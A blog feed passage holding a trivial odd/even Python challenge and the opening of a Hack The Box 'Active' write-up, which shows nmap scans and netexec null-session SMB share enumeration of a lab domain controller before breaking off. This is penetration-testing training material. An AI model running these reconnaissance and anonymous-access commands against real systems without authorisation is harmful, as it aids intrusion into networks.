https://substackcdn.com/image/fetch/$s_!xyRy!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png 848w, https://substackcdn.com/image/fetch/$s_!xyRy!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png 1272w, https://substackcdn.com/image/fetch/$s_!xyRy!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xyRy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png" width="880" height="391" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:391,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:142326,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192705196?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xyRy!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png 424w, https://substackcdn.com/image/fetch/$s_!xyRy!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png 848w, https://substackcdn.com/image/fetch/$s_!xyRy!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png 1272w, https://substackcdn.com/image/fetch/$s_!xyRy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Oddly Even</h2><p>See who has claimed the blood for this challenge.</p><p>Question:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># take in the number
n = int(input())

# calculate answer


# print answer
print(answer)</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-xRt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-xRt!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png 424w, https://substackcdn.com/image/fetch/$s_!-xRt!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png 848w, https://substackcdn.com/image/fetch/$s_!-xRt!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png 1272w, https://substackcdn.com/image/fetch/$s_!-xRt!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-xRt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png" width="1456" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:64804,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192705196?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-xRt!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png 424w, https://substackcdn.com/image/fetch/$s_!-xRt!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png 848w, https://substackcdn.com/image/fetch/$s_!-xRt!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png 1272w, https://substackcdn.com/image/fetch/$s_!-xRt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbc1dd79-ea36-4070-83bc-167a66f083aa_1918x1033.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Answer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># take in the number
n = int(input())
if n % 2 == 0:
    print("even")
# calculate answer
else:
# print answer
    print("odd")</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1K9p!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1K9p!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png 424w, https://substackcdn.com/image/fetch/$s_!1K9p!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png 848w, https://substackcdn.com/image/fetch/$s_!1K9p!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png 1272w, https://substackcdn.com/image/fetch/$s_!1K9p!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1K9p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png" width="1456" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:70540,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192705196?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1K9p!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png 424w, https://substackcdn.com/image/fetch/$s_!1K9p!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png 848w, https://substackcdn.com/image/fetch/$s_!1K9p!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png 1272w, https://substackcdn.com/image/fetch/$s_!1K9p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbc54357-6ce6-47fb-b5f5-f666e2f6c309_1918x1033.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Active - Windows (Easy)]]></title><description><![CDATA[An easy Windows Active Directory machine that's start with abusing SMB Anon account to gain SVC credential on XML files, and turns-out that SVC gain Kerberoasting upon Administrator password.]]></description><link>https://byt3n33dl3.substack.com/p/htb-active-windows-easy</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-active-windows-easy</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Mon, 30 Mar 2026 05:09:29 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!jKjs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jKjs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jKjs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png 424w, https://substackcdn.com/image/fetch/$s_!jKjs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png 848w, https://substackcdn.com/image/fetch/$s_!jKjs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png 1272w, https://substackcdn.com/image/fetch/$s_!jKjs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jKjs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png" width="822" height="532" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:532,&quot;width&quot;:822,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:185766,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192576101?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jKjs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png 424w, https://substackcdn.com/image/fetch/$s_!jKjs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png 848w, https://substackcdn.com/image/fetch/$s_!jKjs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png 1272w, https://substackcdn.com/image/fetch/$s_!jKjs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0318dc-e49c-4788-b057-a2d61087f33e_822x532.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB:</em> Active is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.</p><p>An easy Windows Active Directory machine that&#8217;s start with abusing SMB Anon account to gain SVC credential on XML files. </p><p>Turns-out that SVC gain Kerberoasting upon Administrator password.</p><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ ping -c2 10.129.10.151
PING 10.129.10.151 (10.129.10.151) 56(84) bytes of data.
64 bytes from 10.129.10.151: icmp_seq=1 ttl=127 time=253 ms
64 bytes from 10.129.10.151: icmp_seq=2 ttl=127 time=254 ms

--- 10.129.10.151 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 252.922/253.350/253.778/0.428 ms</code></pre></div><p>Let&#8217;s NMAP:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;1cc0e584-42f6-40b2-a4c4-f94b2c8273e3&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.129.10.151 -oA nmap/nmap
Starting Nmap 7.98 ( https://nmap.org ) at 
Warning: 10.129.10.151 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.10.151
Host is up (0.25s latency).
Not shown: 65513 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49162/tcp open  unknown
49166/tcp open  unknown
49169/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;df7e6d22-e414-4f1e-8486-fa5437c1ffe2&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ sudo nmap -Pn -p53,88,135,139,389,445,464,593,636,3268-3269,5722,9389 -sC -sV 10.129.10.151 -oA nmap/nmap-ports
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for DC (10.129.10.151)
Host is up (0.25s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-30 04:36:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5722/tcp open  msrpc         Microsoft Windows RPC
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-03-30T04:37:31
|_  start_date: 2026-03-30T04:32:47
|_clock-skew: -8s
| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><ol start="2"><li><p><em>SMB Anon Access Enumeration</em></p></li></ol><p>After some enumeration, we can abuse *blank user as access to enumerate SMB shares, and we got READ access on some.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ sudo netexec smb dc.active.htb -u '' -p '' --shares
SMB         10.129.10.151   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.10.151   445    DC               [+] active.htb\:
SMB         10.129.10.151   445    DC               [*] Enumerated shares
SMB         10.129.10.151   445    DC               Share           Permissions     Remark
SMB         10.129.10.151   445    DC               -----           -----------     ------
SMB         10.129.10.151   445    DC               ADMIN$                          Remote Admin
SMB         10.129.10.151   445    DC               C$                              Default share
SMB         10.129.10.151   445    DC               IPC$                            Remote IPC
SMB         10.129.10.151   445    DC               NETLOGON                        Logon server share
SMB         10.129.10.151   445    DC               Replication     READ
SMB         10.129.10.151   445    DC               SYSVOL                          Logon server share
SMB         10.129.10.151   445    DC               Users</code></pre></div><p>NetExec with Spider_plus module:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ sudo netexec smb dc.active.htb -u '' -p '' --shares -M spider_plus
SMB         10.129.10.151   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.10.151   445    DC               [+] active.htb\:
SPIDER_PLUS 10.129.10.151   445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.10.151   445    DC               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.10.151   445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.10.151   445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.10.151   445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.10.151   445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.10.151   445    DC               [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.129.10.151   445    DC               [*] Enumerated shares
SMB         10.129.10.151   445    DC               Share           Permissions     Remark
SMB         10.129.10.151   445    DC               -----           -----------     ------
SMB         10.129.10.151   445    DC               ADMIN$                          Remote Admin
SMB         10.129.10.151   445    DC               C$                              Default share
SMB         10.129.10.151   445    DC               IPC$                            Remote IPC
SMB         10.129.10.151   445    DC               NETLOGON                        Logon server share
SMB         10.129.10.151   445    DC               Replication     READ
SMB         10.129.10.151   445    DC               SYSVOL                          Logon server share
SMB         10.129.10.151   445    DC               Users
SPIDER_PLUS 10.129.10.151   445    DC               [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.10.151.json".
SPIDER_PLUS 10.129.10.151   445    DC               [*] SMB Shares:           7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
